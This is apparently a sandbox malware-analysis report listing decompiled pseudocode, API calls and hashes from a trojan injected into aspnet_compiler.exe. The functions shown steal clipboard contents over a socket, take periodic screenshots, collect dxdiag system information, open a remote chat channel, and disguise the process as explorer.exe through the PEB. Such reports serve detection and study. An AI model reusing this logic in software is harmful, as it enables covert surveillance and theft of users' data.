                								_push(_t69);
                								goto L18;
                							}
                						}
                						return 0x2726;
                					}
                				}
                			}

                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: 65535$udp
                • API String ID: 0-1267037602
                • Opcode ID: f017f730da5f423951df016acc56fe018b36abbe325d1b6e8ffc0416dff523dd
                • Instruction ID: dec2bdb26369982db7c5889bd327832f44181b2331e29388f4f60b1078a915a5
                • Opcode Fuzzy Hash: f017f730da5f423951df016acc56fe018b36abbe325d1b6e8ffc0416dff523dd
                • Instruction Fuzzy Hash: A551E235649301ABE7209E26D904BA77BE4ABC8711F08082FFA4593390D67DCDC18A5F
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0043913A(void* __edx, void* __eflags, char* _a4, int _a8, char* _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                				int _v8;
                				int _v12;
                				char _v16;
                				intOrPtr _v24;
                				char _v28;
                				void* __ebx;
                				char* _t31;
                				int _t35;
                				int _t43;
                				void* _t51;
                				int _t52;
                				int _t54;
                				void* _t56;
                				void* _t63;
                				short* _t64;
                				short* _t67;
                
                				_t62 = __edx;
                				E004390B7(_t51,  &_v28, __edx, _a24);
                				_t52 = 0;
                				_t54 =  *(_v24 + 0x14);
                				_t31 = _a4;
                				_v8 = _t54;
                				if(_t31 == 0) {
                					L4:
                					 *((intOrPtr*)(E0043EEAD())) = 0x16;
                					E0043A5BB();
                					L18:
                					if(_v16 != 0) {
                						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                					}
                					return _t52;
                				}
                				_t66 = _a8;
                				if(_a8 == 0) {
                					goto L4;
                				}
                				 *_t31 = 0;
                				if(_a12 == 0 || _a16 == 0) {
                					goto L4;
                				} else {
                					_t35 = MultiByteToWideChar(_t54, 0, _a12, 0xffffffff, 0, 0);
                					_v12 = _t35;
                					if(_t35 != 0) {
                						_t64 = E00444A38(_t54, _t35 + _t35);
                						_t56 = _t63;
                						if(_t64 != 0) {
                							if(MultiByteToWideChar(_v8, 0, _a12, 0xffffffff, _t64, _v12) != 0) {
                								_t67 = E00444A38(_t56, _t66 + _t66);
                								if(_t67 != 0) {
                									_t43 = E00446260(0, _t62, _t67, _a8, _t64, _a16, _a20, _a24);
                									_v12 = _t43;
                									if(_t43 != 0) {
                										if(WideCharToMultiByte(_v8, 0, _t67, 0xffffffff, _a4, _a8, 0, 0) != 0) {
                											_t52 = _v12;
                										} else {
                											E0043EE77(GetLastError());
                										}
                									}
                								}
                								E00445002(_t67);
                							} else {
                								E0043EE77(GetLastError());
                							}
                						}
                						E00445002(_t64);
                					} else {
                						E0043EE77(GetLastError());
                					}
                					goto L18;
                				}
                			}

                APIs
                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439192
                • GetLastError.KERNEL32(?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043919F
                • __dosmaperr.LIBCMT ref: 004391A6
                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004391D2
                • GetLastError.KERNEL32(?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004391DC
                • __dosmaperr.LIBCMT ref: 004391E3
                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D35,?), ref: 00439226
                • GetLastError.KERNEL32(?,?,?,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439230
                • __dosmaperr.LIBCMT ref: 00439237
                • _free.LIBCMT ref: 00439243
                • _free.LIBCMT ref: 0043924A
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                • String ID:
                • API String ID: 2441525078-0
                • Opcode ID: 387fdbec446251a5819ea95fd4c06fc554ddba64297b234dd1e89704fec95358
                • Instruction ID: 02b817c51ddb1bfcd431cbf40756152772ff8ffa7747545afeb7dfc7970056dd
                • Opcode Fuzzy Hash: 387fdbec446251a5819ea95fd4c06fc554ddba64297b234dd1e89704fec95358
                • Instruction Fuzzy Hash: 5A31D37140460BBFEF116FA5DC45CAF3B68EF09325F1002AAF810662A1DB78CD10DBA9
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 76%
                			E00405480(char* __edx, void* __eflags, intOrPtr _a4) {
                				struct tagMSG _v52;
                				void* _v56;
                				char _v60;
                				char _v76;
                				char _v80;
                				char _v84;
                				char _v104;
                				char _v108;
                				void* _v112;
                				char _v116;
                				char _v120;
                				char _v140;
                				void* _v176;
                				void* __ebx;
                				void* __ebp;
                				intOrPtr* _t28;
                				char* _t36;
                				intOrPtr _t45;
                				intOrPtr _t46;
                				void* _t57;
                				intOrPtr _t69;
                				void* _t111;
                				void* _t113;
                				void* _t115;
                				void* _t117;
                				signed int _t118;
                				void* _t121;
                				void* _t122;
                				void* _t123;
                				void* _t124;
                
                				_t126 = __eflags;
                				_t101 = __edx;
                				_t69 = _a4;
                				E004020D6(_t69,  &_v104, __edx, __eflags, _t69 + 0xc);
                				SetEvent( *(_t69 + 0x24));
                				_t28 = E00401F8B( &_v108);
                				E00404182( &_v108,  &_v60, 4, 0xffffffff);
                				_t121 = (_t118 & 0xfffffff8) - 0x5c;
                				E004020D6(_t69, _t121, _t101, _t126, 0x472ec8);
                				_t122 = _t121 - 0x18;
                				E004020D6(_t69, _t122, _t101, _t126,  &_v76);
                				E0041A976( &_v140, _t101);
                				_t123 = _t122 + 0x30;
                				_t111 =  *_t28 - 0x3a;
                				if(_t111 == 0) {
                					E00401E45( &_v116, _t101, _t117, __eflags, 0);
                					_t36 = E0040245C();
                					E00401F8B(E00401E45( &_v120, _t101, _t117, __eflags, 0));
                					_t101 = _t36;
                					_t113 = E00411235();
                					__eflags = _t113;
                					if(_t113 == 0) {
                						L7:
                						E00401E6D( &_v116, _t101);
                						E00401FB8();
                						E00401FB8();
                						__eflags = 0;
                						return 0;
                					}
                					 *0x470af0 = E004114AA(_t113, "DisplayMessage");
                					_t45 = E004114AA(_t113, "GetMessage");
                					_t104 = "CloseChat";
                					 *0x470ae8 = _t45;
                					_t46 = E004114AA(_t113, "CloseChat");
                					_t124 = _t123 - 0x18;
                					 *0x470aec = _t46;
                					 *0x470ae5 = 1;
                					E004020D6(_t69, _t124, "CloseChat", __eflags, 0x472f60);
                					_push(0x74);
                					E00404A81(_t69, _t104, __eflags);
                					L10:
                					_t115 = HeapCreate(0, 0, 0);
                					__eflags =  *0x470ae8(_t115,  &_v140);
                					if(__eflags != 0) {
                						_t124 = _t124 - 0x18;
                						E00402097(_t69, _t124, _t104, _t117, __eflags, _v140, _t51);
                						_push(0x3b);
                						E00404A81(_t69, _t104, __eflags);
                						HeapFree(_t115, 0, _v176);
                					}
                					goto L10;
                				}
                				_t128 = _t111 != 1;
                				if(_t111 != 1) {
                					goto L7;
                				}
                				_t57 =  *0x470af0(E00401F8B(E00401E45( &_v116, _t101, _t117, _t128, 0)));
                				_t129 = _t57;
                				if(_t57 == 0) {
                					goto L7;
                				}
                				E0040415E(_t69,  &_v80, _t101, _t117, 0x464070);
                				_t101 =  &_v84;
                				E0041A879(_t69, _t123 - 0x18,  &_v84);
                				_push(0x3b);
                				E00404A81(_t69,  &_v84, _t129);
                				E00401EE9();
                				L4:
                				while(GetMessageA( &_v52, 0, 0, 0) > 0) {
                					TranslateMessage( &_v52);
                					DispatchMessageA( &_v52);
                				}
                				if(__eflags < 0) {
                					goto L4;
                				}
                				goto L7;
                			}

                APIs
                • SetEvent.KERNEL32(?,?), ref: 0040549F
                • GetMessageA.USER32 ref: 0040554F
                • TranslateMessage.USER32(?), ref: 0040555E
                • DispatchMessageA.USER32 ref: 00405569
                • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00472F60), ref: 00405621
                • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405659
                  • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                • String ID: CloseChat$DisplayMessage$GetMessage
                • API String ID: 2956720200-749203953
                • Opcode ID: 9a9cef7513b8a7c28d617c5da1d5a4d1d9789a6d3744142bf81144b806ac5329
                • Instruction ID: ded252b4ff533e87208d36ac19c2d613ad87dfbb1ef060abaf95112ea2b93138
                • Opcode Fuzzy Hash: 9a9cef7513b8a7c28d617c5da1d5a4d1d9789a6d3744142bf81144b806ac5329
                • Instruction Fuzzy Hash: 7B419271A043016BCA04FB75DC5A86F77A9EBC5714F40093EFA06A31E5DF398905CB9A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 15%
                			E00406A20(void* __edx, void* __esi, void* __ebp) {
                				char _v4;
                				signed int _v20;
                				void* __ebx;
                				void* __ecx;
                				signed int _t19;
                				void* _t40;
                				void* _t48;
                				intOrPtr _t49;
                				void* _t52;
                				void* _t53;
                				void* _t54;
                				void* _t56;
                				char* _t57;
                				void* _t59;
                				signed int _t65;
                
                				_t56 = __ebp;
                				_t53 = __esi;
                				_t52 = _t48;
                				if(_t52 != 0) {
                					L3:
                					 *0x470b04(_t53, _t56);
                					_t54 = E004068CB();
                					if(_t52 == 0) {
                						_t49 =  *((intOrPtr*)(_t54 + 0x10));
                						_t57 = L"explorer.exe";
                						 *0x473968 =  *(_t49 + 0x3c);
                						 *0x47396c =  *(_t49 + 0x44);
                						_t19 =  *0x470b14; // 0x0
                					} else {
                						_t57 =  *0x47396c;
                						_t19 =  *0x473968;
                					}
                					 *0x470afc( *((intOrPtr*)(_t54 + 0x10)) + 0x38, _t19);
                					 *0x470afc( *((intOrPtr*)(_t54 + 0x10)) + 0x40, _t57);
                					if(_t52 != 0) {
                						_v20 = _v20 & 0x00000000;
                						 *0x470b0c(GetCurrentProcess(), 0x470b14,  &_v20, 0x8000);
                						 *0x470b14 =  *0x470b14 & 0x00000000;
                						_t65 =  *0x470b14;
                					}
                					E00406874(_t65, "PEB: %x\n", _t54);
                					E0040683F(_t65);
                					E00406874(_t65, "\n",  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x10)) + 0x3c)));
                					E0040683F(_t65);
                					E00406874(_t65, "\n",  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x10)) + 0x44)));
                					 *0x470b10();
                					return  *0x470af8(0, E0040697D, _t52);
                				}
                				 *0x470b14 =  *0x470b14 & 0x00000000;
                				_t1 =  &_v4; // 0x473220
                				_v4 = 0x1000;
                				_t40 =  *0x470b00(GetCurrentProcess(), 0x470b14, 0, _t1, 0x3000, 4);
                				_t62 = _t40;
                				if(_t40 < 0) {
                					_push("[-] NtAllocateVirtualMemory Error\n");
                					return E00406874(__eflags);
                				}
                				E0043E0D9( *0x470b14, E0043A99F(GetCurrentProcess, _t48, _t62, L"windir"));
                				E0043E0FB( *0x470b14, L"\\explorer.exe");
                				_push("[+] NtAllocateVirtualMemory Success\n");
                				E00406874(_t62);
                				_t59 = _t59 + 0x18;
                				goto L3;
                			}



















                APIs
                • GetCurrentProcess.KERNEL32(00470B14,00000000, 2GBm@,00003000,00000004,00000000,00000001), ref: 00406A51
                • GetCurrentProcess.KERNEL32(00470B14,00000000,00008000,?,00000000,00000001,00000000,00406CCA,C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe), ref: 00406B12
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CurrentProcess
                • String ID: 2GBm@$PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                • API String ID: 2050909247-2552087879
                • Opcode ID: 73c293382bdeff948eb64d5676536ed9b638f881f9f110030419796dfdf152da
                • Instruction ID: acb57f4be5314c8fdc403cfcc3c6874ba858f2dc6f38655895ae1e2efeca9399
                • Opcode Fuzzy Hash: 73c293382bdeff948eb64d5676536ed9b638f881f9f110030419796dfdf152da
                • Instruction Fuzzy Hash: EC31D8B2642300EBC710FFA5DC45F1677B8AB45349F11443AF506A6191DBB8E954CB2D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 80%
                			E00415881(void* __ebp, void* _a8, char _a16, char _a24, char _a28, void* _a152, void* _a176) {
                				void* __ebx;
                				void* _t16;
                				struct HWND__* _t23;
                				void* _t38;
                				void* _t41;
                
                				if(OpenClipboard(_t23) != 0) {
                					EmptyClipboard();
                					CloseClipboard();
                					if(OpenClipboard(_t23) != 0) {
                						_t38 = GetClipboardData(0xd);
                						_t16 = GlobalLock(_t38);
                						GlobalUnlock(_t38);
                						CloseClipboard();
                						_t29 =  !=  ? _t16 : 0x46a8f0;
                						E0040415E(_t23,  &_a28, _t34, __ebp,  !=  ? _t16 : 0x46a8f0);
                						_t34 =  &_a24;
                						E0041A879(_t23, _t41 - 0x18,  &_a24);
                						_push(0x6b);
                						E00404A81(0x4734e8,  &_a24, _t16);
                						E00401EE9();
                					}
                				}
                				E00401E6D( &_a16, _t34);
                				E00401FB8();
                				E00401FB8();
                				return 0;
                			}









                APIs
                • OpenClipboard.USER32 ref: 00415882
                • EmptyClipboard.USER32 ref: 00415890
                • CloseClipboard.USER32 ref: 00415896
                • OpenClipboard.USER32 ref: 0041589D
                • GetClipboardData.USER32 ref: 004158AD
                • GlobalLock.KERNEL32 ref: 004158B6
                • GlobalUnlock.KERNEL32(00000000), ref: 004158BF
                • CloseClipboard.USER32 ref: 004158C5
                  • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                • String ID: 4G
                • API String ID: 2172192267-3080958808
                • Opcode ID: 1150ac069ea0e5be6ecf8168bf5002337176f77d960d035dfdd9d53e1e5f48f9
                • Instruction ID: 4d86aa06e49f03239fcc2a4fb0273d51e2f014b5d08f715770ad07ab5d505bde
                • Opcode Fuzzy Hash: 1150ac069ea0e5be6ecf8168bf5002337176f77d960d035dfdd9d53e1e5f48f9
                • Instruction Fuzzy Hash: 9D0121312083009BC314BF75EC596AE77A5BF90352F40493EFD06922A3DF38C946DA9A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 93%
                			E00419668(char _a4) {
                				intOrPtr _v28;
                				struct _SERVICE_STATUS _v32;
                				int _t22;
                				void* _t26;
                				void* _t27;
                
                				_t22 = 0;
                				_t27 = OpenSCManagerW(0, 0, 0x11);
                				_t26 = OpenServiceW(_t27, E00401EE4( &_a4), 0xf003f);
                				if(_t26 != 0) {
                					if(ControlService(_t26, 1,  &_v32) != 0) {
                						do {
                							QueryServiceStatus(_t26,  &_v32);
                						} while (_v28 != 1);
                						StartServiceW(_t26, 0, 0);
                						asm("sbb ebx, ebx");
                						_t22 = 3;
                						CloseServiceHandle(_t27);
                						CloseServiceHandle(_t26);
                					} else {
                						CloseServiceHandle(_t27);
                						CloseServiceHandle(_t26);
                						_t22 = 2;
                					}
                				} else {
                					CloseServiceHandle(_t27);
                				}
                				E00401EE9();
                				return _t22;
                			}









                APIs
                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,00418FE1,00000000), ref: 00419677
                • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,00418FE1,00000000), ref: 0041968E
                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418FE1,00000000), ref: 0041969B
                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00418FE1,00000000), ref: 004196AA
                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418FE1,00000000), ref: 004196BB
                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418FE1,00000000), ref: 004196BE
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Service$CloseHandle$Open$ControlManager
                • String ID:
                • API String ID: 221034970-0
                • Opcode ID: c6a6868a821c40bf285a10c9e2759082c71f22d9f97c071ba597590d66903f3d
                • Instruction ID: 3276af7575f15d8841acc4b0191f81aff6206dc885fe3b462974ed1c719105d3
                • Opcode Fuzzy Hash: c6a6868a821c40bf285a10c9e2759082c71f22d9f97c071ba597590d66903f3d
                • Instruction Fuzzy Hash: 0B11E5319042187FD710AF64ECC9CFF3BACDB52BA6B000036F915921D1DB688D469AF9
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004469A1(char _a4) {
                				char _v8;
                
                				_t26 = _a4;
                				_t52 =  *_a4;
                				if( *_a4 != 0x45b2e0) {
                					E00445002(_t52);
                					_t26 = _a4;
                				}
                				E00445002( *((intOrPtr*)(_t26 + 0x3c)));
                				E00445002( *((intOrPtr*)(_a4 + 0x30)));
                				E00445002( *((intOrPtr*)(_a4 + 0x34)));
                				E00445002( *((intOrPtr*)(_a4 + 0x38)));
                				E00445002( *((intOrPtr*)(_a4 + 0x28)));
                				E00445002( *((intOrPtr*)(_a4 + 0x2c)));
                				E00445002( *((intOrPtr*)(_a4 + 0x40)));
                				E00445002( *((intOrPtr*)(_a4 + 0x44)));
                				E00445002( *((intOrPtr*)(_a4 + 0x360)));
                				_v8 =  &_a4;
                				E00446867(5,  &_v8);
                				_v8 =  &_a4;
                				return E004468B7(4,  &_v8);
                			}





                APIs
                • _free.LIBCMT ref: 004469B5
                  • Part of subcall function 00445002: HeapFree.KERNEL32(00000000,00000000,?,0044F4EF,?,00000000,?,00000000,?,0044F793,?,00000007,?,?,0044FCDE,?), ref: 00445018
                  • Part of subcall function 00445002: GetLastError.KERNEL32(?,?,0044F4EF,?,00000000,?,00000000,?,0044F793,?,00000007,?,?,0044FCDE,?,?), ref: 0044502A
                • _free.LIBCMT ref: 004469C1
                • _free.LIBCMT ref: 004469CC
                • _free.LIBCMT ref: 004469D7
                • _free.LIBCMT ref: 004469E2
                • _free.LIBCMT ref: 004469ED
                • _free.LIBCMT ref: 004469F8
                • _free.LIBCMT ref: 00446A03
                • _free.LIBCMT ref: 00446A0E
                • _free.LIBCMT ref: 00446A1C
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: a77394449d3610cf2611ec2a31762a356df4dfaed9a22a67b89f0f03ee6ab5ce
                • Instruction ID: 446d01ee53aad5418ccd4e85611433309046038f6e50f54d807d40262714f670
                • Opcode Fuzzy Hash: a77394449d3610cf2611ec2a31762a356df4dfaed9a22a67b89f0f03ee6ab5ce
                • Instruction Fuzzy Hash: F511B9B9100509BFEF01EF56D842CDD3B69FF04758B1140AAF9488F222D676DE509B85
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 85%
                			E00418B0F() {
                				intOrPtr* _t42;
                				void* _t45;
                				char* _t54;
                				void* _t72;
                				long _t78;
                				void* _t83;
                				struct _SECURITY_ATTRIBUTES* _t85;
                				struct _SECURITY_ATTRIBUTES* _t92;
                				void* _t131;
                				void* _t132;
                				void* _t140;
                				void* _t141;
                				void* _t146;
                				intOrPtr _t147;
                				void* _t148;
                				void* _t149;
                
                				E00456328(E00456753, _t146);
                				_push(_t141);
                				 *((intOrPtr*)(_t146 - 0x10)) = _t147;
                				_t92 = 0;
                				 *((intOrPtr*)(_t146 - 4)) = 0;
                				_t149 =  *0x470da4 - _t92; // 0x0
                				if(_t149 == 0) {
                					_t147 = _t147 - 0xc;
                					_t131 = _t146 - 0x68;
                					E004174ED(_t131);
                					__imp__GdiplusStartup(0x470da4, _t131, 0);
                				}
                				_t150 =  *0x4726a8 - _t92;
                				if( *0x4726a8 == _t92) {
                					E00401EF3(0x473600, _t132, _t141, E00418023(_t146 - 0x40, _t132));
                					E00401EE9();
                				}
                				_t42 = E00401F8B(E00401E45(0x473298, _t132, _t146, _t150, 0x19));
                				_t45 = E00401EE4(E0041A7B9(_t146 - 0x58, E00401E45(0x473298, _t132, _t146, _t150, 0x1a)));
                				_t134 =  *_t42;
                				E00401EF3(0x473618,  *_t42, 0x473618, E0040CF38(_t146 - 0x40,  *_t42, _t45));
                				E00401EE9();
                				E00401EE9();
                				CreateDirectoryW(E00401EE4(0x473618), _t92);
                				E00401F66(_t92, _t146 - 0xb0);
                				E00401F66(_t92, _t146 - 0x80);
                				 *(_t146 - 0x11) = _t92;
                				 *0x470d63 = 1;
                				_t54 =  *((intOrPtr*)(_t146 + 8));
                				_t145 =  !=  ? L"time_%04i%02i%02i_%02i%02i%02i" : L"wnd_%04i%02i%02i_%02i%02i%02i";
                				 *(_t146 - 0x18) =  !=  ? L"time_%04i%02i%02i_%02i%02i%02i" : L"wnd_%04i%02i%02i_%02i%02i%02i";
                				_t140 = Sleep;
                				L6:
                				while(1) {
                					if( *_t54 != 1) {
                						L11:
                						GetLocalTime(_t146 - 0x28);
                						_push( *(_t146 - 0x1c) & 0x0000ffff);
                						_push( *(_t146 - 0x1e) & 0x0000ffff);
                						_push( *(_t146 - 0x20) & 0x0000ffff);
                						_push( *(_t146 - 0x22) & 0x0000ffff);
                						_push( *(_t146 - 0x26) & 0x0000ffff);
                						E004174C7(_t146 - 0x2b8, _t145,  *(_t146 - 0x28) & 0x0000ffff);
                						_t147 = _t147 + 0x20;
                						E00401EF3(_t146 - 0x80, _t66, _t145, E00402FF4(_t92, _t146 - 0x58, E00402FF4(_t92, _t146 - 0x40, E004087F0(_t146 - 0x98, 0x473618, _t146, "\\"), _t140, _t146, __eflags, _t146 - 0x2b8), _t140, _t146, __eflags, 0x4644f0));
                						E00401EE9();
                						E00401EE9();
                						E00401EE9();
                						_t72 = E00401EE4(_t146 - 0x80);
                						_t134 =  *((intOrPtr*)( *((intOrPtr*)(_t146 + 8)) + 1));
                						E004189C9(_t72,  *((intOrPtr*)( *((intOrPtr*)(_t146 + 8)) + 1)), __eflags);
                						__eflags =  *((char*)( *((intOrPtr*)(_t146 + 8))));
                						if(__eflags != 0) {
                							_t92 = 0;
                							 *(_t146 - 0x11) = 0;
                							_t78 = E0043A3AC(_t75, E00401F8B(E00401E45(0x473298, _t134, _t146, __eflags, 0x18))) * 0x3e8;
                							__eflags = _t78;
                						} else {
                							_t78 = E0043A3AC(_t79, E00401F8B(E00401E45(0x473298, _t134, _t146, __eflags, 0x15))) * 0xea60;
                						}
                						Sleep(_t78);
                						_t54 =  *((intOrPtr*)(_t146 + 8));
                						continue;
                					}
                					_t145 = L"wnd_%04i%02i%02i_%02i%02i%02i";
                					 *(_t146 - 0x18) = L"wnd_%04i%02i%02i_%02i%02i%02i";
                					while(1) {
                						_t153 = _t92;
                						if(_t92 != 0) {
                							goto L11;
                						}
                						_t83 = E00401F8B(E00401E45(0x473298, _t134, _t146, _t153, 0x17));
                						_t148 = _t147 - 0x18;
                						E0040415E(_t92, _t148, _t134, _t146, _t83);
                						_t85 = E0041AECA(0, _t134);
                						_t147 = _t148 + 0x18;
                						_t92 = _t85;
                						 *(_t146 - 0x11) = _t92;
                						if(_t92 != 0) {
                							goto L11;
                						}
                						Sleep(0x3e8);
                					}
                					goto L11;
                				}
                			}




















                APIs
                • __EH_prolog.LIBCMT ref: 00418B14
                • GdiplusStartup.GDIPLUS(00470DA4,?,00000000), ref: 00418B46
                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 00418BD2
                • Sleep.KERNEL32(000003E8), ref: 00418C58
                • GetLocalTime.KERNEL32(?), ref: 00418C60
                • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00418D4F
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                • API String ID: 489098229-3790400642
                • Opcode ID: 83ab5a1f807aee275f6c9b7f2735ccbbfe226c5f98278b5de8977729f6c5689f
                • Instruction ID: 3ed6f2237b04738f373db28fc4f4b477a217fcc6b97d40d34bd9c141d7353832
                • Opcode Fuzzy Hash: 83ab5a1f807aee275f6c9b7f2735ccbbfe226c5f98278b5de8977729f6c5689f
                • Instruction Fuzzy Hash: 62515E70A002149BCB14BBA5D8969FE7BA9AF54308F00007FF905A72D2EE3C5E859799
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,004558FF), ref: 00454828
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: DecodePointer
                • String ID: acos$asin$exp$log$log10$pow$sqrt
                • API String ID: 3527080286-3064271455
                • Opcode ID: 0e018571e0e3bee39f27182ae3374471161ca0f080fa7e6920fbb972b2695178
                • Instruction ID: 1e4b404f929ba93ddebd2aa3e63fb042eaa484edc2c2b789af0694e21190d044
                • Opcode Fuzzy Hash: 0e018571e0e3bee39f27182ae3374471161ca0f080fa7e6920fbb972b2695178
                • Instruction Fuzzy Hash: F2519474900509DBCB04DF69E5481AEBBB4FB8930AF504197DC44AF256C7398EADCB1D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 92%
                			E00416495(void* __ecx, void* __edx, void* __edi, void* __eflags, char _a4) {
                				char _v28;
                				char _v52;
                				char _v76;
                				char _v204;
                				void* __ebx;
                				void* __esi;
                				void* __ebp;
                				void* _t46;
                				void* _t54;
                				void* _t55;
                				void* _t90;
                				void* _t92;
                				void* _t93;
                
                				_t95 = __eflags;
                				_t90 = __edi;
                				E00402FF4(_t54,  &_v76, E0040415E(_t54,  &_v52, __edx, _t92, E0043A99F(_t54, __ecx, __eflags, L"temp")), _t90, _t92, _t95, L"\\sysinfo.txt");
                				E00401EE9();
                				_t55 = 0;
                				ShellExecuteW(0, L"open", L"dxdiag", E00401EE4(E0040AEF6( &_v52, L"/t ", _t92,  &_v76)), 0, 0);
                				E00401EE9();
                				E004020BF(0,  &_v28);
                				_t91 = 0;
                				do {
                					E00401EE4( &_v76);
                					_t88 =  &_v28;
                					E0041ADFE( &_v28);
                					Sleep(0x64);
                					_t91 = _t91 + 1;
                				} while (E0040619C() != 0 && _t91 < 0x4b0);
                				if(E0040619C() == 0) {
                					DeleteFileW(E00401EE4( &_v76));
                					_t75 =  &_v204;
                					E004046D7( &_v204, _t92, 1);
                					_t46 = E004048A8( &_v204, _t91, _t75);
                					_t100 = _t46;
                					if(_t46 != 0) {
                						_t91 = _t93 - 0x18;
                						_t88 = E00402F11( &_v52,  &_a4, _t92, 0x472ec8);
                						E00402EF0(_t55, _t93 - 0x18, _t49, _t92, _t100,  &_v28);
                						_push(0x97);
                						E00404A81( &_v204, _t49, _t100);
                						E00401FB8();
                						E00404E06(_t88);
                						_t55 = 1;
                					}
                					E00404EC2(_t55,  &_v204, _t88, _t91);
                				}
                				E00401FB8();
                				E00401EE9();
                				E00401FB8();
                				return _t55;
                			}

















                APIs
                • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004164F5
                  • Part of subcall function 0041ADFE: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409DB6), ref: 0041AE17
                • Sleep.KERNEL32(00000064), ref: 00416521
                • DeleteFileW.KERNEL32(00000000), ref: 00416555
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
